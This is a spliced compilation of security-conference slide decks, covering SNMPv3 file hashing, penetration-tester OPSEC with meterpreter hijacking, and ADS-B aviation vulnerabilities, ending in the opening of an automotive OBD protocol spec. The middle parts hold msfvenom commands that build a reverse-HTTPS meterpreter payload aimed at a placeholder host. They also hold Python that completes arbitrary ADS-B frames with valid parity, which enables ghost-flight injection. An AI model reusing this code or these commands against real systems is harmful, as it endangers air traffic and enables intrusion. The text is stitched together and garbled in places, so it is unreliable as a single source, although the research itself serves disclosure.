PakSecured extensions use mhash libraries thus allowing use of any of
the mechanisms they contain (see sourcecode)
Easily extensible to use mcrypt (or libraries of choice)
Always set up your initial security in a secure environment before exposing
the system to the elements.
SUMMARY: SNMP is a Message Passing Protocol.
Slide 12
Net-SNMP
Net-SNMP has had v3 since 1998
http://www.netsnmp.org
_the_ reference application for SNMP
Originally based on the Carnegie Mellon University and University of
California at Davis SNMP implementations.
Includes various tools relating to SNMP including:
An extensible agent
An SNMP library
Tools to request or set information from SNMP agents
Tools to generate and handle SNMP traps
Can use multiple transports
IPv4 UDP/TCP
IPv6 UDP/TCP
IPX on Linux !!!
Slide 13
PakDefConX MIB
PakDefConX
::= { enterprises 9248 }
PakDC
OBJECT IDENTIFIER ::= { PakDefConX 1 } -- The OBJECT IDENTIFIER for all PakDefConX tricks
PakSETFiles
OBJECT IDENTIFIER ::= { PakDC 1 }
PakTestFileString OBJECT-TYPE
SYNTAX OCTET STRING (SIZE(0..1024))
MAX-ACCESS read-write
STATUS current
DESCRIPTION
"A publicly settable string that can be set for testing
snmpsets. This value will eventually be used as the file
name for the PakHash function."
::= { PakSETFiles 1 }
PakTestFileHash OBJECT-TYPE
SYNTAX OCTET STRING
MAX-ACCESS read-only
STATUS current
DESCRIPTION
"This object returns the md5sum of the file name
set into PakFileTestString.
Only the md5sum is returned."
::= { PakSETFiles 2 }
Slide 14
PakDefConX Source Code
Source is provided as a patch against Net-SNMP v5.x
Tested on all versions up to 5.0.2.pre1 as of 7/8/2002
Get Net-SNMP version 5 - CVS usually works best.
Apply the patch (patch -p1 < {patch file location}
Edit the PakConfigure file in the source root dir
Run the PakConfigure file (bash PakConfigure)
make; make install
Play
Requires that mhash library 0.8.10 or greater be installed.
http://mhash.sourceforge.net
Slide 15
The Point (why you are here...)
Assuming that you have the Net-SNMP patched and compiled:
Install an SNMPv3 user for the daemon
cat > /var/net-snmp/snmpd.conf
createUser defconx MD5 defconxv3 DES defconxcrypt ^D
cat > /usr/local/share/snmp/snmpd.conf
rwuser defconx ^D
Fire up the daemon - /usr/local/sbin/snmpd
Now to play with the mib defs:
snmpwalk -u defconx -l authPriv -a MD5 -A defconxv3 -x DES -X defconxcrypt localhost .1.3.6.1.4.1.9248
PAKDEFCONX-MIB::PakTestFileString.0 = STRING: "/etc/hosts"
PAKDEFCONX-MIB::PakTestFileHash.0 = STRING: "5b41d38e2a46d028902e3cecf808c582"
DEFINE {insert Stuff} = '-u defconx -l authPriv -a MD5 -A defconxv3 -x DES -X defconxcrypt'
snmpset {insert Stuff} localhost .1.3.6.1.4.1.9248.1.1.1.0 s "/etc/services"
PAKDEFCONX-MIB::PakTestFileString.0 = STRING: "/etc/services"
snmpwalk {insert Stuff} localhost .1.3.6.1.4.1.9248
PAKDEFCONX-MIB::PakTestFileString.0 = STRING: "/etc/services"
PAKDEFCONX-MIB::PakTestFileHash.0 = STRING: "24fd8b34bc51d3ebfab4784ca63a70e7"
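The same walk can be scripted. Below is a hedged sketch using pysnmp (assumed installed; API per the 4.x hlapi) that queries the two PakDefConX objects over the authPriv MD5/DES session configured above:

from pysnmp.hlapi import (
    SnmpEngine, UsmUserData, UdpTransportTarget, ContextData,
    ObjectType, ObjectIdentity, getCmd,
    usmHMACMD5AuthProtocol, usmDESPrivProtocol,
)

user = UsmUserData(
    'defconx', authKey='defconxv3', privKey='defconxcrypt',
    authProtocol=usmHMACMD5AuthProtocol, privProtocol=usmDESPrivProtocol,
)

errInd, errStat, errIdx, varBinds = next(getCmd(
    SnmpEngine(), user, UdpTransportTarget(('localhost', 161)), ContextData(),
    ObjectType(ObjectIdentity('1.3.6.1.4.1.9248.1.1.1.0')),  # PakTestFileString
    ObjectType(ObjectIdentity('1.3.6.1.4.1.9248.1.1.2.0')),  # PakTestFileHash
))

for name, value in varBinds:
    print('%s = %s' % (name.prettyPrint(), value.prettyPrint()))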
FV Oiler.
Slide 16
Comments, Critiques, CIA
These are words that begin with a 'c'
Slide 17
Replacing TripWire with SNMPv3
Matthew G. Marsh
Chief Scientist of the NEbraskaCERT
Wesley McGrew, Ph.D.
Director of Cyber Operations
[email protected]
@McGrewSecurity
Secure Penetration
Testing Operations
Demonstrated Weaknesses in
Learning Material and Tools
Bio
• Co-Founder of HORNE Cyber, previously
Halberd Group
• Directs and participates
• Penetration testing engagements
• Research and development
• Adjunct professor at Mississippi State University
• NSA-CAE Cyber Operations program
• Information Security & Reverse Engineering
Insecure practices used on penetration tests put
clients and penetration testers alike at risk.
Penetration testers and clients during/between
engagements are attractive soft targets.
The root cause of this problem is a lack of awareness,
and learning materials that teach insecure practices.
This has to change.
The Situation at a Glance
• Previous and Current Work
• The Threat
• Role of Learning and Reference Materials
• Analysis of Currently-Available Materials
• Recommended Best Practices
• Demonstration and Tool Release
• Snagterpreter – Hijack meterpreter sessions
• Conclusions
• Call to Action
What are we covering today?
Two previous papers & presentations, DEF CON 21 and 23
Where are we?
This work – a paper and talk studying the root
causes of these issues, recommending change.
Why is the compromise of a
penetration tester attractive?
As a Target
Tools, tactics, procedures. Intellectual property.
Operational Cover For Compromising Clients
Testers are expected to break rules, attack,
elevate privilege, exfiltrate.
The Threat
No Standard
Dependent on experience, intuition, pattern recognition,
and complex ad-hoc processes
Tradeoff: Flexibility vs. Rigor
We operate as we learn
Lowest Common Denominator = Profit
No formal requirements for education
Few prerequisites
No testing requirements
Cause and Effect
Testing Processes Follow Training
Convenience and Expediency
Lower Depth & Breadth of Technical Knowledge
Lack of Situational Awareness in Secure
Operation/Communication
Re-applying procedures learned in reading/training to
more complex operational environments
Cause and Effect
How are secure practices in
penetration testing covered
(or not covered) in learning and
reference materials?
Books, Training, Standards
Documents
The Study – The Goal
Books: 16
Top Amazon results, well-known and popular books
Training: 3
Publicly available material, limited (NDAs, cost)
Standards: 4
Well known
The Study – The Material
Disclosure:
You’ll see from the results: the lack of coverage of secure
practices, and the promotion of vulnerable practices, is the
norm, not an outlier.
Titles, author names, sources, are not stated. The purpose is
to demonstrate an industry-wide need to move forward.
Examples are provided, if you’re well-read, you may
recognize them.
The Study – Disclosure
Host Security,
Penetration Tester
Does the work address precautions for
preventing penetration testers’ systems
from being compromised?
The Study – The Questions
Host Security, Client
Does the work address precautions for
maintaining the security of client
systems during the test?
The Study – The Questions
COMSEC
Does the work address establishing
secure means of communicating with
the client about the engagement?
The Study – The Questions
Client Data in Transit
Does the work address issues
surrounding the transmission of
sensitive client data between targets
and penetration testers’ systems in the
course of the engagement?
The Study – The Questions
Client Data at Rest
Does the work discuss procedures for
securing client data at rest, during,
and/or after the engagement?
The Study – The Questions
OSINT OPSEC
Does the work address operational
security during intelligence gathering
phases?
The Study – The Questions
Potential Threats
Does the work address issues with
conducting tests against systems over
hostile networks, such as the public
Internet or unencrypted wireless?
The Study – The Questions
Insecure Practices
Does the work demonstrate or teach at
least one example of an insecure
practice without describing how it might
leave the tester or client vulnerable?
The Study – The Questions
Results
Columns: 1 - Host Security, Penetration Tester; 2 - Host Security, Client; 3 - COMSEC; 4 - Client Data in Transit; 5 - Client Data at Rest; 6 - OSINT OPSEC; 7 - Potential Threats; 8 - Insecure Practices

Resource  1  2  3  4  5  6  7  8
1         Y  N  N  N  Y  N  N  N
2         N  N  N  N  N  N  N  Y
3         N  N  N  N  N  N  N  Y
4         N  N  N  N  N  N  N  Y
5         Y  Y  Y  Y  Y  Y  Y  N
6         N  N  N  Y  Y  N  N  Y
7         N  N  N  N  N  N  N  Y
8         N  N  N  N  N  N  N  Y
9         N  Y  N  N  Y  N  N  Y
10        N  N  N  N  N  N  N  Y
11        N  N  N  N  N  N  N  Y
12        N  N  N  N  N  N  N  N
13        N  Y  Y  Y  Y  Y  N  Y
14        N  N  N  N  N  N  N  Y
15        N  N  N  N  N  N  N  Y
16        N  N  N  N  N  N  N  Y
17        N  N  N  N  N  N  N  Y
18        N  N  Y  Y  N  N  N  Y
19        N  Y  N  Y  Y  N  N  Y
20        N  N  N  N  Y  N  N  Y
21        N  N  N  N  N  N  N  Y
22        N  N  N  N  N  N  N  Y
23        Y  N  N  Y  Y  N  N  Y
Mostly red! Almost every one specifically teaches insecure practice.
Out of 24 works…
14 did not address basic issues.
4 addressed more than two issues.
Every work that actually covered technical
practices described actions that were potentially
dangerous/insecure.
2 did not cover technical practices
1 Warned about unencrypted networks
Analysis
Unencrypted
command and control
netcat, web shells, default
meterpreter, etc.
Analysis – Most Common Flaw
You’ll have to attend or watch
the talk itself to hear specific
(an humorous) examples of
the most insecure practices
presented in the works
studied.
“Greatest Hits”
Client Communication Security
OSINT OPSEC
Awareness
Host Security – Client and Pentester
Data at Rest
Recommendations
Demonstration
Snagterpreter
Hijacking HTTP/HTTPS meterpreter sessions.
•
Metasploit’s Meterpreter – Most commonly used and documented
penetration testing implant/post-exploitation tool.
•
Easy to use, more fully featured than a shell, therefore popular
•
Operational use – Often traversing hostile networks, such as the
public Internet.
•
Protocols
•
Type-Length-Value – Commands & Responses
•
Transport – TCP, or HTTP/HTTPS for stateless resilience
•
Default encryption is for evasion, not security!
•
The developers know this, have implemented paranoid mode to
validate server & client certificates
•
Nobody teaches anyone how to use this apart from official docs
•
Let’s demonstrate non-paranoid-mode hijacking…
What’s going on in this demo?
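For reference (since the bullets above note that paranoid mode is rarely taught), here is a hedged sketch of turning it on; option names are per Metasploit's paranoid-mode documentation at the time of writing, and host, port and certificate path are placeholders, so verify against your framework version:

# Build a stageless HTTPS payload pinned to your own certificate
msfvenom -p windows/meterpreter_reverse_https LHOST=203.0.113.1 LPORT=443 \
    HandlerSSLCert=./cert.pem StagerVerifySSLCert=true -f exe -o payload.exe

# Handler side, in msfconsole
use exploit/multi/handler
set payload windows/meterpreter_reverse_https
set LHOST 203.0.113.1
set LPORT 443
set HandlerSSLCert ./cert.pem
set StagerVerifySSLCert true
run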
Penetration tester,
test thyself!
Conclusions
•
In this work:
•
Explained threats
•
Demonstrated vulnerabilities
•
You cannot have it both ways
•
You can’t report on vulnerabilities in situations involving
malicious actors intercepting and modifying traffic.
•
…while ignoring that threat model in your own operations
•
We must improve
•
Tools
•
Techniques
•
Processes
•
It all has to be integrated into learning material
Conclusions
Take-Away Points
Wesley McGrew
[email protected]
@McGrewSecurity
Materials
White paper, slides, code
https://hornecyber.com/ <precise URL provided in final slides>
Contact
• Penetration testers put themselves and their clients at risk with insecure practices. Third-party malicious attackers can take advantage of this.
• The root cause: available learning materials teach insecure practices and do not address security issues. This leads to a lack of rigor in penetration testing practices.
• Direct and mindful action must be taken by penetration testers, tool developers, and learning material authors to remedy this problem.
Hackers +
Airplanes
No Good Can Come Of This
Defcon 20
Brad “RenderMan” Haines, CISSP
www.renderlab.net
[email protected]
Twitter: @IhackedWhat
+
=
Who Am I?
Consultant – Wireless, Physical,
General Security, CISSP
Author – 7 Deadliest Wireless
Attacks, Kismet Hacking, RFID
Security
Trainer – Wireless and Physical
security
Hacker – Renderlab.net
Hacker Group Member – Church of
Wifi, NMRC
Defcon Old Timer – Every year
since DC7
First, The Kaminsky Problem
● At multiple cons, over multiple years, speaking
in opposite rooms
● Getting rather ridiculous
● I have yet to see any of his talks live
● Summed up as the “RenderMan Birthday
Paradox” on his blog
● Ironic since yesterday (27th) was my birthday
● Can someone confirm if they are scheduling
this intentionally?
Ass Covering
● For the love of Spongebob, do not actually try
any of the ideas in this talk outside of a lab!!!
● We are talking about commercial airliners and
people's lives here; serious stuff
● Use this information to make air travel safer
● Think about how this happened and make sure
future systems are built secure from the start
● Hackers need to be included in more areas
than we are now
Ass Covering
● I Want To Be Wrong! If I am wrong about something,
call me on it, publicly!
● I am not a pilot, ATC operator, or in any way associated
with the airline industry or aviation beyond flying cattle
class. A Lot!
● I may have some details or acronyms wrong, I
apologize, feel free to correct me
● This research is ongoing and too important to keep
hidden until completion
● I want to prove to myself this is safe, so far I've failed,
so I need your help
It All Started With An App
● I got interested purely by
accident
● Bought Planefinder AR in
October 2010
● Overlays flight information
through camera
● GPS location + Direction +
web lookup of flights
● This is cool, how does it
work?
Planefinders
● Planefinder.net, Flightradar24.com, Radarvirtuel.com
● Aggregates data from all over the world
● User provided ground stations and data
● Generates near real time (~10 min delay) Google Map of
air traffic
● Supports queries for Airlines, cities, tail numbers, flight
numbers, etc
● Lots of interesting info
● Also contained info on how the site and App worked
It Went Downhill From There
● Been under-employed
for over a year
● When I get bored, bad
things happen
● I still fly to a lot of
speaking gigs
● Started thinking about
airplane tracking
● This is why I should
always be employed
Current Air Traffic Control
● Has not changed much since
the 1970s
● Primary radar provides range
and bearing, no elevation
● Transponder system (SSR)
queries the plane, plane
responds with a 4-digit
identifier + elevation
● ID number attached to flight
on radar scope, great deal of
manual communication and
work required
Current Air Traffic Control
● Transponder ID used to communicate situations
i.e. emergencies, hijacking, etc
● Transponder provides a higher power return
than primary radar reflection, longer range
● Only interrogated every 6-12 seconds, low
resolution of altitude
● Pilots get no benefit (traffic, etc)
● Requires large separation of planes (~80 miles)
which limits traffic throughput in busy areas
Current Air Traffic Control
● IFR flights are waypoint
based, not optimal or direct
path
● Air travel is increasing,
capacity is limited
● Weather and other events
(i.e. volcanoes) can cause
havoc around the world
● Something needed to
change
Nextgen Air Traffic Control
● Late 90's FAA initiative to revamp the ATC
system in the US, and via ICAO, the world
● Do more with less
● Modernize the ATC system over approximately
20 years
● Save costs on ATC equipment, save fuel, save
time, increase capacity
● ADS-B is the key feature, the datasource for
Planefinder sites and the focus of this talk
ADS-B
● Automatic Dependent Surveillance – Broadcast
● Planes use GPS to determine their position, broadcast over
1090MHz (978MHz for GA) at 1Hz
● Contains Aircraft ID, altitude, position lat/lon, bearing, speed
● Received by a network of ground stations
● Particularly useful over radar 'dead zones', i.e. mountainous
regions, oceans, Hudson Bay, Gulf of Mexico, Alaskan
mountains
● Certainty of location allows for flights to be closer (5 miles)
● Two forms: ADS-B Out and ADS-B In
ADS-B Out
Looks a lot like any other network packet doesn't it?
ADS-B Out
● No interrogation needed (Automatic)
● Instead of primary/secondary radar, planes
report their location from GPS (Dependent)
● Sent omni-directionally to ground stations and
other aircraft (Broadcast)
● ATC's scope is populated from received signals
● Uses 1090MHz for commercial (big stuff),
978MHz for general aviation (small stuff)
ADS-B In
● ADS-B IN: Optional equipment can be installed in aircraft to
listen to ADS-B out from planes and ATC
● Allows planes to be aware of each other without ATC
intervention (TIS-B)
● Also allows for real time weather data (FIS-B)
● Situational awareness increases dramatically, allows more
flights operate simultaneously
● Also works for ground equipment and taxiing aircraft
● Expensive!! $5-10K for ADS-B out, $20K for ADS-B In
● GA market getting cheaper though
● Not a lot of used market yet (problem for researchers)
Planefinder.net
(London, 7/11/12)
Scary Stuff
● The hacker side of my brain took over
● Started to investigate how this worked and what
measures may be in use to mitigate threats
● Could not immediately find answers (trust us!)
● Previous experience shows no answer usually
means hadn't thought of it, or have thought of it,
but too late, let's hide the answer
● Started digging deeper and found I'm not the
only one
And Now The Scary Part
● ADS-B is unencrypted and unauthenticated
● Anyone can listen to 1090Mhz and decode the
transmissions from aircraft in real time
● Simple pulse position modulation (PPM)
● No data level authentication of data from aircraft, just
simple checksums
● Some correlation of primary radar sighting to received
data (changing to multilateration, more on that later)
● I am running a ground station at home, monitoring all
traffic in and out of Edmonton
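To make "simple checksums" concrete, here is a rough Python sketch of what a ground station does with each 112-bit extended squitter: check the CRC-24 parity (generator polynomial 0x1FFF409) and read out the fields, which are otherwise plaintext. The sample frame is a widely circulated valid DF17 example, not one of my captures.

def crc24(bits):
    """Mode S CRC-24 remainder over a bit string; 0 for a valid DF17 frame."""
    reg = [int(b) for b in bits]
    for i in range(len(reg) - 24):
        if reg[i]:                      # XOR in the 25-bit generator
            for j in range(25):
                reg[i + j] ^= (0x1FFF409 >> (24 - j)) & 1
    return int("".join(map(str, reg[-24:])), 2)

def decode(frame_hex):
    bits = bin(int(frame_hex, 16))[2:].zfill(len(frame_hex) * 4)
    return {
        "downlink_format": int(bits[0:5], 2),   # 17 = ADS-B extended squitter
        "icao_address": frame_hex[2:8],         # 24-bit airframe identifier
        "type_code": int(bits[32:37], 2),       # what the 56-bit payload holds
        "parity_ok": crc24(bits) == 0,          # the only integrity check
    }

print(decode("8D4840D6202CC371C32CE0576098"))
# -> downlink_format 17, icao_address '4840D6', type_code 4, parity_ok True

Nothing in the frame authenticates the sender; position decoding (CPR) is fiddlier, but off-the-shelf libraries such as pyModeS handle it.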
Others
● Others have begun to look and to question
● Righter Kunkel, Defcon 18
● Balint Seeber, spench.net – SDR research
● USAF Major Donald L. McCallie – Graduate
research project
● Nick Foster – SDR and radio enthusiast
● No one has come up with solid security
answers in several years of research
Why This Matters
● Largely a N. America problem but being utilized
all over the world, adopted more widely every year
● UPS equipped all of their fleet
● ADS-B equipped planes are in the air over your
head right now
● The inevitable direction of ATC for the next
couple decades
● I fly a lot and want to get home from here safely
● A multitude of threat vectors to look at
ADS-B Out Threat #1
● Eavesdropping: Easily capture cleartext
data of air traffic
● Data mining potential; we know what's in
the air and when
● See the talk after mine: Busting the BARR:
Tracking “Untrackable” Private Aircraft for
Fun & Profit
● They will go more into it
ADS-B Out Threat #2
● Injection: Inject 'ghost' flights into ATC systems
● Documents that discuss fusing ADS-B with primary radar, also
discuss discontinuing primary radar
● Introduce slight variations in real flights
● Generally cause confusion at inopportune moments (weather,
Holidays, major travel hubs, Olympics)
● Create regular false flights, train the system (smugglers)
● Some documentation discussing Multilateration, nothing denoting
its mandatory use
ADS-B Out Threat #3
● Jamming: Outright Jam ATC reception of ADS-B
signals
● Could be detected and DF'd quickly, but are
facilities available for that?
● Proper target location and timing could cause
mass chaos (London Olympics?)
● Co-ordinated jamming across many travel hubs?
Accidental or intentional?
● Simple frequency congestion already a problem,
no contention protocol
ADS-B In Threat #1
● Injection: Inject data into aircraft ADS-B In
displays
● Inject confusing, impossible, scary types of
traffic to elicit a response
● Introduce conflicting data between ATC and
cockpit displays
● Autopilot systems using ADS-B In data for
collision avoidance?
● Aircraft have no source for multilateration
ADS-B In Threat #2
● GPS Jamming: Block planes ability to use GPS
● North Korea currently jamming GPS along border
● UK tests found widespread use along highways
● Newark airport caused grief daily by truck
mounted jammer
● ~$20-30 on Dealextreme.com
● Easily tucked into baggage on a timer
● Removes ADS-B advantages
ADS-B In Threat #3
● GPS Spoofing: Introduce manipulated signal to
generate false lat/lon reading
● Aircraft location no longer reliable
● Best case, fall back to traditional navigation
● Worst case, remote steering of aircraft
● Iran may have used this technique to capture
US drone
● Already shown to be able to screw with US
drones recently (sub ~$1000)
ADS-B Unknown Threats
● Some threats are total unknowns. The ATC system is
huge and hard to parse from public docs
● What about injecting data for a flight on the west coast,
into a ground station on the east coast?
● Has anyone fuzzed a 747 or a control tower? Buffer
overflow at 36,000 feet?
● Look into Chris Roberts of One World Labs work on
embedded control systems on planes, ships, cars, etc.
Mix in ADS-B.....Scary stuff.
● Verification of ADS-B chip level code. Could be used
as a control channel?
ADS-B Threat Mitigations?
● You hope that the engineers, FAA, DHS, everyone
else looked at these threats
● FAA submitted ADS-B to NIST for Security
Certification, but.....
● “ the FAA specifically assessed the vulnerability risk
of ADS–B broadcast messages being used to target
air carrier aircraft. This assessment contains
Sensitive Security Information that is controlled
under 49 CFR parts 1 and 1520, and its content is
otherwise protected from public disclosure”
ADS-B Threat Mitigation
● It gets worse: “While the agency cannot
comment on the data in this study, it can confirm,
for the purpose of responding to the comments
in this rulemaking proceeding, that using ADS–B
data does not subject an aircraft to any
increased risk compared to the risk that is
experienced today” - Docket No. FAA–2007–29305;
Amdt. No.91–314
● What threats are those? Why not threats of
tomorrow? Why not threats we have'nt thought
of yet?
ADS-B Threat Mitigation
● Multilateration: time difference between signal
receiving stations
● Provides correlation that ADS-B data matches
signal source
● No indication this will be used everywhere
● What if the data doesn't match?
● How does the ATC UI indicate a mismatch?
● Liability issues for ATC equipment vendors
ignoring data?
ADS-B Threats
● Basically the response is: “Trust Us”
● Second time I ran across this excuse. Last time was
RFID passports (look how that turned out)
● I don't know about you, but I never trust anyone who says
'Trust Me'
● Not trying to spew FUD, but to raise awareness and
pressure to disclose more information about existing
threat mitigation technology
● Also want to see disclosure of procedures for 'weird crap'
● Hackers looking at ATC will get a response
ADS-B Threats
● A common response will be 'It's too expensive
for the common man'
● ~$20 USB TV tuner can be made into a
software defined radio and used to receive
ADS-B
● Helping Dragorn get cheap receivers working
on Kismet and ADS-B support (wardriving for
aircraft!)
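As a sense of how low the bar is: with the pyrtlsdr bindings, spotting candidate Mode S bursts from one of those tuners takes a few lines of Python. This is a crude sketch; a real receiver like dump1090 does proper preamble correlation and bit slicing, and the gain setting here is an arbitrary assumption.

import numpy as np
from rtlsdr import RtlSdr

sdr = RtlSdr()
sdr.sample_rate = 2e6       # 2 Msps: one ADS-B bit = 2 samples
sdr.center_freq = 1090e6    # Mode S / ADS-B downlink
sdr.gain = 40               # assumption; tune for your antenna

samples = sdr.read_samples(256 * 1024)
sdr.close()

mag = np.abs(samples)
threshold = mag.mean() + 4 * mag.std()

# Mode S preamble pulses sit at 0, 1.0, 3.5 and 4.5 microseconds,
# i.e. sample offsets 0, 2, 7 and 9 at 2 Msps.
hits = [i for i in range(len(mag) - 10)
        if all(mag[i + k] > threshold for k in (0, 2, 7, 9))]
print(len(hits), "candidate Mode S preambles in this capture")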
ADS-B Threats
● Got word while in the air en route to Poland
● Nick Foster implemented ADS-B Out on GNU
Radio
● A synthetic report generated and decoded by
the GNU Radio ADS-B receiver: (-1
0.0000000000) Type 17 subtype 05 (position
report) from abcdef at (37.123444,
-122.123439) (48.84 @ 154) at 30000ft
● Honeymoon is over, exploit #1 is here
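Why the honeymoon ended so fast: "valid" only means the parity matches, and the parity is computable by anyone. Below is a hedged Python sketch of finishing an arbitrary 88-bit payload into a frame that passes every receiver-side integrity check; the ME field here is a meaningless placeholder, not a correctly CPR-encoded position, and nothing here modulates or transmits anything.

def crc24_remainder(bits):
    reg = list(bits)
    for i in range(len(reg) - 24):
        if reg[i]:
            for j in range(25):
                reg[i + j] ^= (0x1FFF409 >> (24 - j)) & 1
    return reg[-24:]

def finish_frame(payload_hex):
    """Append the Mode S parity to an 88-bit payload
    (DF/CA byte + 24-bit ICAO address + 56-bit ME field)."""
    bits = [int(b) for b in bin(int(payload_hex, 16))[2:].zfill(88)]
    parity = crc24_remainder(bits + [0] * 24)   # remainder of payload * x^24
    return "%028X" % int("".join(map(str, bits + parity)), 2)

# DF17 from the made-up ICAO 'abcdef', as in the synthetic report above
print(finish_frame("8DABCDEF" + "20000000000000"))

That is the entire barrier to entry; the receiver that decoded the synthetic 'abcdef' report had nothing else to verify.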
ADS-B Out GNU Radio
ADS-B Threats
● Nick Foster raised his game
● ADS-B In on FlightGear (OSS flight sim) populates
sim environment with real planes
● ADS-B data generated by your virtual plane, fed into
GNU Radio and put out over the real air
● Your virtual world is now transmitting into the real
world.
● Output now pseudo-matches a real plane's
behaviour
● FlightGear also has an intercept course feature
ADS-B Threats
● Plan is to release the software
● Need to run past the EFF first to make sure we
don't get shot, disappeared, etc
● We have the capability to generate arbitrary
packets, anyone else could easily do this
● All testing was at 900MHz ISM band
● Easy to adjust for UAT ADS-B for GA
● The next guys might not be so nice
Other Threats
● Autopilot integration of ADS-B
● Collision avoidance systems
● Tailored approach (ATC upload landing plan to
aircraft)
● Aircraft are huge, complex systems
● Reading on one system leads you to many
others
Future
● ADS-B will be mandatory by 2020
● Europe delaying till 2030
● Already in use in N. America, Europe, China, Australia
● Even if not in use at airports, equipped planes are flying
overhead
● Still time to develop countermeasures (don't turn off
primary radar!)
● If you have a 747 or similar and/or an air traffic control
tower that I can borrow for a while, please let me know
Suggested Reading
● https://federalregister.gov/a/2010-19809 - FAA
Rulemaking on ADS-B
● http://www.hsdl.org/?abstract&did=697737 -
USAF graduate research project on ADS-B
Vulnerabilities
● http://www.radartutorial.eu - Good overview of
radar tech and ADS-B format
● http://www.oig.dot.gov/sites/dot/files/ADS-B_Oct%202010.pdf - OIG
report on other risks to ADS-B
Conclusion
● This is pretty scary to consider
● How many people want to take the bus home?
● We should all be working on finding and solving
problems like this
● If I can find this stuff, so can bad guys
● Significant investment has been made already
● I want to hear your comments and your ideas on
further threats and research. Lets work on this
together!
Thanks - Questions
Please Prove Me Wrong!
I will post responses if I am wrong!
Email: [email protected]
Twitter: @ihackedwhat
Website: www.renderlab.net
An Open Implementation of Automotive Communication and Diagnostic Protocols

The goal of the OpenOtto project is to provide complete, free, and open access to the networked electronic devices in an automobile. The interface to vehicle devices will be primarily through the standard diagnostic connector, though communication will be supported through all busses, not only diagnostic busses. Access to vehicle devices will include monitoring and diagnostics as well as reprogramming and enhanced control of their operation.

Contents

1 Hardware
1.1 Physical Layer Requirements
1.1.1 Pulse Width Modulation (PWM)
1.1.2 Variable Pulse Width Modulation (VPW)
1.1.3 ISO
1.1.4 Controller Area Network (CAN)
1.2 Software Data Link Devices
1.2.1 Serial
1.2.2 Parallel
1.2.3 GPIO
1.3 Hardware Data Link Devices
1.3.1 Microcontroller
1.3.2 Programmable Hardware
1.3.3 Development Board
2 Device Protocols
2.1 Software Data Link Device Kernel Interface
2.2 OBD Over Stream Protocol
2.3 Network Interface
2.4 OBD Over IP Protocol
3 Drivers
3.1 Kernel Driver
3.2 Driver Daemon (ottod)
4 Libraries
4.1 Data Link Decode
4.2 Vehicle Identification Number (libvin)
4.3 Diagnostic Test Modes (libobd2)
4.4 Non-OBD Protocols
4.5 High Level Application Functions (libotto)
5 Applications
5.1 Interface Configuration (ottoconfig)
5.2 Network Monitor (ottodump)
5.3 Network Scanner (ottoprobe? ottomap? ottoscan?)
5.4 Network Exploration Tool (ottocat)
5.5 Scan Tool (scantool)
5.6 OttoMann (ottomann)
B.1 Supported Devices
B.2 Unsupported Devices
C.1 Supported
C.2 Support in Development
C.3 Unsupported

List of Tables

1 Pulse Width Modulation Physical Layer
2 Variable Pulse Width Modulation Physical Layer
3 ISO Physical Layer
4 Controller Area Network Physical Layer
5 Serial Hardware Interface Pin Assignments
6 Serial Hardware Interface Pin Assignments
7 Parallel Hardware Interface Pin Assignments
8 Data Packet Format
9 Pulse Configuration IDs
10 OBD Over Stream Control Characters
11 Decoded VIN Data Type
12 DTC Database Schema

Copyright (c) 2004 Darius Rad. This file is part of the OpenOtto project. OpenOtto is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.

Foreword

• todo: other things in foreword: history, acknowledgements

1 Hardware

Interface between the computer and the automotive physical layer. Certain devices are restricted to certain data link layers and/or certain subsets of protocols, messages, and addresses.

Hardware data link devices and software data link devices are similar; the major difference is that in hardware data link devices the software that decodes the data link is embedded in the device and generally referred to as firmware. In all devices except for the programmable logic based devices, the data link decode is performed in software on a microprocessor.

1.1 Physical Layer Requirements

Provide an interface between CMOS/TTL level signals and bus level signals. Where applicable based on the bus type, provide termination, differential signalling, and a half duplex interface.

1.1.1 Pulse Width Modulation (PWM)

The Pulse Width Modulation (PWM) bus type is specified in SAE J1850.

Table 1: Pulse Width Modulation Physical Layer
Bit Encoding | pulse width modulation
Drive Type | differential voltage
Data Rate | 41.6 kbps
Minimum Pulse Width | 6 µs
Media | dual wire
Output Low Voltage | min 0 V, max 1.2 V
Output High Voltage | min 3.8 V, max 5.25 V

1.1.2 Variable Pulse Width Modulation (VPW)

The Variable Pulse Width Modulation (VPW) bus type is specified in SAE J1850.

Table 2: Variable Pulse Width Modulation Physical Layer
Bit Encoding | variable pulse width modulation
Drive Type | voltage
Data Rate | 10.4 kbps
Minimum Pulse Width | 34 µs
Media | single wire
Output Low Voltage | min 0 V, max 1.5 V
Output High Voltage | min 6.25 V, max 8 V

1.1.3 ISO

The ISO bus type is specified in ISO 14230-1. This physical layer is the same as that specified by ISO 9141-2 for vehicles with a 12 V electrical system. The ISO bus type employs a similar signalling scheme to a serial port as specified in TIA-232. With appropriate voltage level conversion, a serial UART may be used to communicate on an ISO bus.

Table 3: ISO Physical Layer
Bit Encoding | voltage level
Drive Type | voltage
Data Rate | 10.4 kbps
Minimum Pulse Width | 67 µs
Media | single wire
Output Low Voltage | min 0 V, max 2.4 V
Output High Voltage | min 9.6 V, max 12 V

1.1.4 Controller Area Network (CAN)

The Controller Area Network (CAN) bus type is specified in SAE J2284.

Table 4: Controller Area Network Physical Layer
Bit Encoding | voltage level
Drive Type | differential voltage
Data Rate | 500 kbps
Minimum Pulse Width | 1000 ns
Media | dual wire
Output Low Voltage | 1.5 V
Output High Voltage | 3.5 V

1.2 Software Data Link Devices

The software data link devices provide little to no additional circuitry beyond logic conversion. All data link decode is done in software. In these devices, the physical layer interface is optimized so that signal conversion is directly between the automotive bus and the computer bus, instead of converting to and from CMOS/TTL signalling.

The requirements for the computer interface of a software data link device are one bit of input, one bit of output, and a double edge sensitive interrupt on the input. Processor clock speed, interrupt latency, and I/O latency may affect the maximum possible data rates, and may make some or all of the network types impossible to implement with a particular interface. For slower busses, polling with a level sensitive or single edge sensitive interrupt, or no interrupt, may be adequate on faster processors.

1.2.1 Serial

This device interfaces with a serial port as specified by TIA-232. Only the ISO bus type is compatible with the UART of the serial port. For the VPW, PWM, and CAN bus types, pulses are measured and generated via software. Since the PWM and CAN busses communicate at faster data rates, some hardware may not be able to provide the real time response necessary to support either or both higher speed busses.

• todo: CAN issues: is CAN feasible at all? CAN TX vs. ISO L-line TX, which is more useful?
• todo: each bus connects

Table 5: Serial Hardware Interface Pin Assignments
DB-9 pin | serial function | direction | interrupt | function
1 | DCD | in | delta | CAN RX
2 | RXD | in | no | ISO K-line RX
3 | TXD | out | no | ISO K-line TX
4 | DTR | out | no | ISO L-line TX
5 | GND | | no | signal ground
6 | DSR | in | delta | ISO L-line RX
7 | RTS | out | no | VPW/PWM TX
